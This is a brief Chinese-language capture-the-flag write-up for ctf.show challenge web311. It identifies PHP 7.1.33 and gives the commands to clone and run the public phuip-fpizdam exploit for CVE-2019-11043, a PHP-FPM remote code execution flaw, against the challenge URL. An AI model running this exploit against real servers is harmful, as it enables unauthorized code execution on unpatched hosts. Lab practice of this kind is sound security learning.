
必备知识①虚拟机或wslKali Linux / Ubuntu / Debian都可以②需要用到go环境③设置国内代理我用的是22世纪的科技web3111.当我们打开后发现查看源码用wappalyzer发现是php7.1.33版本然后去搜索php7.1.33cve或者随便组合发现CVE-2019-11043详细自己问AI或者去漏洞库看下①安装go环境sudo apt update sudo apt install golang git -y验证是否装好go version git --version②设置国内Go代理或者抓哆啦A梦让他拿出22世纪的高科技这里我没时间设置代理了直接破碎虚空虚天魔掌一把抓住哆啦A梦从其口袋中拿到了高科技③下载 exp 源码 phuip-fpizdamgit clone https://github.com/neex/phuip-fpizdam.git #拉取下载后要进入文件夹 cd phuip-fpizdam④拉取依赖go get -v⑤运行exp,靶场地址末尾必须带index.phpgo run . http://xxxxxx.challenge.ctf.show/index.php成功标志——下方红色框框web312持续更新中.....web313.......web314........web315